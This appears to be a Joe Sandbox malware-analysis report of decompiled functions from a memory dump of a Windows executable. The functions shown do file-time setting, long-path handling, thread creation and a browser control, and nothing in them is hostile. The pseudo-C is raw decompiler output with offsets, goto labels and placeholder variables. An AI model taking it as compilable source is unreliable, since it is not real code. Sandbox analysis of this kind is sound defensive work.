Instruction ID: 4fe10840dc044aff0ee4cd0bd113d25e19ea5b298685ce94010d88bf6a5bb227
Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction Fuzzy Hash: 8751B175F0022AEFDF15CFA8C880AADB7F5EF58310F2581AAD584E7700EB359A018B50

Uniqueness

Uniqueness Score: -1.00%

Function 0100772B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138
timeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0100772B(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E0101E28C(E01031DF0, _t108);
				E0101E360();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E0100FE56(_t108 - 0x1014, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E0100792E(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4084, 0x800);
					_t113 =  *((short*)(_t108 - 0x4084)) - 0x3a;
					if( *((short*)(_t108 - 0x4084)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E0100FE2E(__eflags, _t108 - 0x1014, _t108 - 0x4084, _t101);
							E010070BF(_t108 - 0x3084);
							_push(0);
							_t54 = E0100A4C6(_t108 - 0x3084, _t99, __eflags, _t106, _t108 - 0x3084);
							_t85 =  *(_t108 - 0x207c);
							 *((char*)(_t108 - 0xd)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E0100A444(_t106, _t85 & 0xfffffffe);
							}
							E01009619(_t108 - 0x203c);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E01009ECF(_t108 - 0x203c, __eflags, _t108 - 0x1014, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x203c);
								_push(0);
								_t68 = E01003B3D(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E010096D0(_t108 - 0x203c);
								}
							}
							E01009619(_t108 - 0x50ac);
							__eflags =  *((char*)(_t108 - 0xd));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 - 0xd)) != 0) {
								_t62 = E010099B0(_t108 - 0x50ac, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x50a8), _t108 - 0x205c, _t108 - 0x2054, _t108 - 0x204c);
								}
							}
							E0100A444(_t106,  *(_t108 - 0x207c));
							E01009653(_t108 - 0x50ac, _t106);
							_t90 = _t108 - 0x203c;
						} else {
							E01009619(_t108 - 0x60d4);
							_push(1);
							_push(_t108 - 0x60d4);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E01003B3D(_t81, _t99);
							_t90 = _t108 - 0x60d4;
						}
						_t61 = E01009653(_t90, _t106);
					} else {
						E01001F94(_t113, 0x53, _t81 + 0x24, _t106);
						_t61 = E01006FC6(0x1040f50, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E0100FE56(_t108 - 0x1014, 0x1033760, 0x802);
					E0100FE2E(_t112, _t108 - 0x1014, _t106, 0x802);
					goto L4;
				}
			}

0x0100772b
0x01007730
0x0100773a
0x01007741
0x0100774a
0x01007779
0x01007779
0x01007787
0x0100778c
0x0100778c
0x0100779c
0x010077a1
0x010077a9
0x010077c8
0x010077cc
0x01007809
0x01007814
0x01007821
0x01007824
0x01007829
0x0100782f
0x01007832
0x01007835
0x01007837
0x0100783c
0x0100783c
0x01007847
0x01007854
0x01007862
0x01007867
0x01007869
0x0100786b
0x01007874
0x01007875
0x01007876
0x0100787b
0x0100787d
0x01007885
0x01007885
0x0100787d
0x01007890
0x01007895
0x01007899
0x0100789d
0x010078a8
0x010078ad
0x010078af
0x010078cc
0x010078cc
0x010078af
0x010078d9
0x010078e4
0x010078e9
0x010077ce
0x010077d4
0x010077d9
0x010077e3
0x010077e4
0x010077e7
0x010077ea
0x010077ef
0x010077ef
0x010078ef
0x010077ab
0x010077b2
0x010077be
0x010077be
0x010078fa
0x01007904
0x01007904
0x0100774c
0x01007750
0x00000000
0x01007752
0x01007752
0x01007764
0x01007772
0x00000000
0x01007772

APIs

__EH_prolog.LIBCMT ref: 01007730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 010078CC

Part of subcall function 0100A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A27A,?,?,?,0100A113,?,00000001,00000000,?,?), ref: 0100A458
Part of subcall function 0100A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A27A,?,?,?,0100A113,?,00000001,00000000,?,?), ref: 0100A489

Strings

:, xrefs: 010077A1

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 5defe6ba35419f3500fcbb26b98bbbc81164128fee57619eed24a04feef2adfa
Instruction ID: f2bb9ce27723c37ce57cc68ba416802dac2cfdf5f91d4ed7b7ef7585f161cc0e
Opcode Fuzzy Hash: 5defe6ba35419f3500fcbb26b98bbbc81164128fee57619eed24a04feef2adfa
Instruction Fuzzy Hash: D7418271900259AAFB26EB54CD54EEEB7BCAF54304F0040DAA6C9A30C1DB786F84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0100B66C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0100B66C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E0101E360();
				_t71 = _a4;
				if( *_t71 != 0) {
					E0100B806(_t71);
					_t66 = E010235B3(_t71);
					_t30 = E0100B832(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E0100B90D( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E0100B207(__eflags,  &_v4100, 0x800);
							_t39 = E010235B3( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E0100FE56(_a8, L"\\\\?\\", _t69);
							E0100FE2E(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E0100B90D(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E0100FE2E(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E0100FE56(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E0100FE2E(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E0100B806(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E0100FE56(_a8, L"\\\\?\\", _t73);
						E0100FE2E(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E0100FE56(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}

0x0100b674
0x0100b67a
0x0100b681
0x0100b68d
0x0100b69a
0x0100b69c
0x0100b6a1
0x0100b6a3
0x0100b729
0x0100b72f
0x0100b731
0x0100b7f0
0x0100b7f0
0x0100b7f0
0x0100b7f2
0x00000000
0x0100b7f3
0x0100b737
0x0100b739
0x00000000
0x00000000
0x0100b748
0x0100b74a
0x0100b78f
0x0100b79b
0x0100b7a5
0x0100b7a9
0x0100b7ab
0x00000000
0x00000000
0x0100b7b6
0x0100b7c6
0x0100b7cb
0x0100b7cf
0x0100b7db
0x0100b7dd
0x0100b7df
0x0100b7df
0x0100b7df
0x0100b7dd
0x0100b7e2
0x0100b7e2
0x0100b7e3
0x0100b7e3
0x0100b7e4
0x0100b7e4
0x0100b7e7
0x0100b7ec
0x00000000
0x0100b7ec
0x0100b74c
0x0100b74f
0x0100b752
0x0100b754
0x00000000
0x00000000
0x0100b763
0x0100b76a
0x0100b77c
0x00000000
0x0100b77c
0x0100b6a6
0x0100b6ab
0x0100b6ad
0x0100b6d5
0x0100b6d6
0x0100b6d9
0x00000000
0x00000000
0x0100b6df
0x0100b6e2
0x0100b6e5
0x00000000
0x00000000
0x0100b6eb
0x0100b6ee
0x0100b6f1
0x0100b6f3
0x00000000
0x00000000
0x0100b702
0x0100b710
0x0100b715
0x0100b716
0x00000000
0x0100b716
0x0100b6af
0x0100b6b2
0x0100b6b5
0x00000000
0x00000000
0x0100b6c6
0x0100b6cb
0x00000000
0x0100b683
0x0100b683
0x0100b7f4
0x0100b7f8
0x0100b7f8

Strings

UNC, xrefs: 0100B708
\\?\, xrefs: 0100B6BE, 0100B6FA, 0100B75B, 0100B7AE

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 81c8886ee76988848064e32f10b4c7145e19d45a52b6a5f7ce1673a05e9ed947
Instruction ID: 72a3082abea26e286a53dcef7bc3fe1944ce4d3b97850472d66ed46106d90a40
Opcode Fuzzy Hash: 81c8886ee76988848064e32f10b4c7145e19d45a52b6a5f7ce1673a05e9ed947
Instruction Fuzzy Hash: A741C33940025BAAEB23AF25CC80EEF77ADBF14750F0440A6F8D897192E770D940C660

Uniqueness

Uniqueness Score: -1.00%

Function 01018FB6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01018FB6(void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v4;
				signed int* _v20;
				void* __ecx;
				void* __esi;
				intOrPtr _t21;
				char _t22;
				signed int* _t26;
				intOrPtr* _t28;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t58;

				_t50 = __edi;
				_t34 = _t35;
				_t53 = _a4;
				 *((intOrPtr*)(_t34 + 4)) = _t53;
				_t21 = E0101E24A(__edx, _t53, __eflags, 0x30);
				_v4 = _t21;
				if(_t21 == 0) {
					_t22 = 0;
					__eflags = 0;
				} else {
					_t22 = E010187EE(_t21);
				}
				 *((intOrPtr*)(_t34 + 0xc)) = _t22;
				if(_t22 == 0) {
					return _t22;
				} else {
					 *((intOrPtr*)(_t22 + 0x18)) = _t53;
					E0101980F( *((intOrPtr*)(_t34 + 0xc)), L"Shell.Explorer");
					_push(1);
					E01019A6E();
					E01019A04( *((intOrPtr*)(_t34 + 0xc)), 1);
					_t26 = E01019901( *((intOrPtr*)(_t34 + 0xc)));
					_t58 = _t26;
					if(_t58 == 0) {
						L7:
						__eflags =  *((intOrPtr*)(_t34 + 0x10));
						if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
							E01018A06(_t34);
							_t28 =  *((intOrPtr*)(_t34 + 0x10));
							__eflags =  *((intOrPtr*)(_t34 + 0x20));
							_push(0);
							 *((char*)(_t34 + 0x25)) = 0;
							_t54 =  *_t28;
							_push(0);
							_push(0);
							_push(0);
							if( *((intOrPtr*)(_t34 + 0x20)) == 0) {
								_push(L"about:blank");
							} else {
								_push( *((intOrPtr*)(_t34 + 0x20)));
							}
							 *0x1033260(_t28);
							_t26 =  *((intOrPtr*)(_t54 + 0x2c))();
						}
						L12:
						return _t26;
					}
					_t10 = _t34 + 0x10; // 0x10
					_t30 = _t10;
					_v4 = _t30;
					 *0x1033260(_t58, 0x103541c, _t30, _t50);
					_t32 =  *((intOrPtr*)( *( *_t58)))();
					 *0x1033260(_t58);
					_t26 =  *((intOrPtr*)( *((intOrPtr*)( *_t58 + 8))))();
					if(_t32 >= 0) {
						goto L7;
					}
					_t26 = _v20;
					 *_t26 =  *_t26 & 0x00000000;
					goto L12;
				}
			}

0x01018fb6
0x01018fb8
0x01018fbb
0x01018fc1
0x01018fc4
0x01018fc9
0x01018fd0
0x01018fdb
0x01018fdb
0x01018fd2
0x01018fd4
0x01018fd4
0x01018fdd
0x01018fe2
0x01019095
0x01018fe8
0x01018fe9
0x01018ff4
0x01018ffc
0x01018ffe
0x01019008
0x01019010
0x01019015
0x01019019
0x0101905a
0x0101905a
0x0101905e
0x01019062
0x01019067
0x0101906c
0x0101906f
0x01019070
0x01019073
0x01019075
0x01019076
0x01019077
0x0101907b
0x01019082
0x0101907d
0x0101907d
0x0101907d
0x01019088
0x0101908e
0x0101908e
0x01019091
0x00000000
0x01019091
0x0101901e
0x0101901e
0x0101902d
0x01019031
0x01019037
0x01019044
0x0101904a
0x0101904f
0x00000000
0x00000000
0x01019051
0x01019055
0x00000000
0x01019055

APIs

new.LIBCMT ref: 01018FC4

Strings

Shell.Explorer, xrefs: 01018FEF
about:blank, xrefs: 01019082

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: b55f3f8a4b3d309a925c9d8f48914834c2e75c15ddea7de7816bb7483816a23c
Instruction ID: d51ed1d13e873e62e812eb2547277b3f88595fc33b148839bfaa7263f409fe33
Opcode Fuzzy Hash: b55f3f8a4b3d309a925c9d8f48914834c2e75c15ddea7de7816bb7483816a23c
Instruction Fuzzy Hash: 8C21E5712043059FDB19DF68C8A496A77A8FF84715B04C5AEF9898F289DF79EC00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0100EBF2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 0100EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0100EB92
Part of subcall function 0100EB73: GetProcAddress.KERNEL32(010481C0,CryptUnprotectMemory), ref: 0100EBA2

GetCurrentProcessId.KERNEL32(?,?,?,0100EBEC), ref: 0100EC84

Strings

CryptUnprotectMemory failed, xrefs: 0100EC7C
CryptProtectMemory failed, xrefs: 0100EC3B

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: e873b199f2a3c4c371d8a1ad72554ca4d5d931c49f765c5fabdb655226a35efc
Instruction ID: 343a73b918a370b881096631ce53f2cb4b80831e162bf3b1b15093f22d551b20
Opcode Fuzzy Hash: e873b199f2a3c4c371d8a1ad72554ca4d5d931c49f765c5fabdb655226a35efc
Instruction Fuzzy Hash: B2116A31A0061D5BFB175B28C945EAE3B48BF00610F04885AECC57F2C5CB3B5D4287D1

Uniqueness

Uniqueness Score: -1.00%

Function 01010889, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E01010889() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0x1040f50 > 0) {
					_t18 = 0x1040f54;
					do {
						_t22 = CreateThread(0, 0x10000, E010109D0, 0x1040f50, 0,  &_v4);
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0x1040f50);
							E01006E8C(E0101F190(E01006E91(0x1040f50)), 0x1040f50, 0x1040f50, 2);
						}
						 *_t18 = _t22;
						 *0x01041054 =  *((intOrPtr*)(0x1041054)) + 1;
						_t8 =  *0x10481d8; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0x1040f50);
					return _t8;
				}
				return _t5;
			}

0x0101088e
0x01010892
0x01010896
0x01010899
0x010108b3
0x010108b7
0x010108b9
0x010108be
0x010108db
0x010108db
0x010108e0
0x010108e2
0x010108e8
0x010108ef
0x010108f4
0x010108f4
0x010108fa
0x010108fb
0x010108fe
0x00000000
0x01010903
0x01010907

APIs

CreateThread.KERNEL32(00000000,00010000,010109D0,?,00000000,00000000), ref: 010108AD
SetThreadPriority.KERNEL32(?,00000000), ref: 010108F4

Part of subcall function 01006E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01006EAF

Strings

CreateThread failed, xrefs: 010108B9

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 7631a693148eaf90f9f3d53047335599c2982216b1a5df11b2f9ce9c328071bb
Instruction ID: 7f38bd9a82c24bcabbfc27b48f7cb0ceb377665810f564897266314a009a45fc
Opcode Fuzzy Hash: 7631a693148eaf90f9f3d53047335599c2982216b1a5df11b2f9ce9c328071bb
Instruction Fuzzy Hash: CE01D6B12443066FE2205E54ECD1BA6739DFB40715F20053EFAC6AA18CCEA6A8809764

Uniqueness

Uniqueness Score: -1.00%

Function 0100130B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0100130B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E0100DA71(0x1040ee8, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E0100DA98(0x1040ee8, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0x1062154(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0x10335b4);
								}
							}
						}
					}
				}
				return 0;
			}

0x01001312
0x01001375
0x01001314
0x01001314
0x0100131b
0x01001331
0x0100133a
0x0100133f
0x01001347
0x0100134f
0x01001357
0x01001365
0x01001365
0x01001357
0x01001347
0x0100133a
0x0100131b
0x0100137d

APIs

Part of subcall function 0100DA98: _swprintf.LIBCMT ref: 0100DABE
Part of subcall function 0100DA98: _strlen.LIBCMT ref: 0100DADF
Part of subcall function 0100DA98: SetDlgItemTextW.USER32(?,0103E154,?), ref: 0100DB3F
Part of subcall function 0100DA98: GetWindowRect.USER32(?,?), ref: 0100DB79
Part of subcall function 0100DA98: GetClientRect.USER32(?,?), ref: 0100DB85

GetDlgItem.USER32(00000000,00003021), ref: 0100134F
SetWindowTextW.USER32(00000000,010335B4), ref: 01001365

Strings

0, xrefs: 0100130E

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 3560b217e073a8c9cbe1f8bb5c25d128593feb03b6d6da3e2529fffd58032aa5
Instruction ID: 2fddf2dd13b4d441c436b75206f832465a8960c06318b7c95b5d9a0a3d5f7adf
Opcode Fuzzy Hash: 3560b217e073a8c9cbe1f8bb5c25d128593feb03b6d6da3e2529fffd58032aa5
Instruction Fuzzy Hash: 38F069B0108248A7FF760EA5C808BED3F98BB61345F088094FEC96A5E0C779C095DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0101084E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0101084E(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E01006E8C(E01006E91(_t6, 0x1040f50, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0x1040f50, 0x1040f50, 2);
				}
				return _t2;
			}

0x0101084e
0x01010854
0x0101085d
0x01010866
0x00000000
0x01010885
0x01010886

APIs

WaitForSingleObject.KERNEL32(?,000000FF,01010A78,?), ref: 01010854
GetLastError.KERNEL32(?), ref: 01010860

Part of subcall function 01006E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01006EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 01010869

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 9f02260dc2acd2a96cc6024728fb444e6385c29432eeb933811315f15efa592f
Instruction ID: 3fc349ea200a1e73aa933f6eab2dbd7b3618d41e05eba21c4d63cc23cedfcb0a
Opcode Fuzzy Hash: 9f02260dc2acd2a96cc6024728fb444e6385c29432eeb933811315f15efa592f
Instruction Fuzzy Hash: 82D02B3150812137D51126249C08DEFB9095F52330F600714F6F86D1ECCE260C5042E1

Uniqueness

Uniqueness Score: -1.00%

Function 0100DA4E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100DA4E(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}

0x0100da51
0x0100da61
0x0100da69
0x0100da6b
0x00000000
0x0100da6b
0x0100da70

APIs

GetModuleHandleW.KERNEL32(00000000,?,0100D32F,?), ref: 0100DA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0100D32F,?), ref: 0100DA61

Strings

RTL, xrefs: 0100DA5B

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
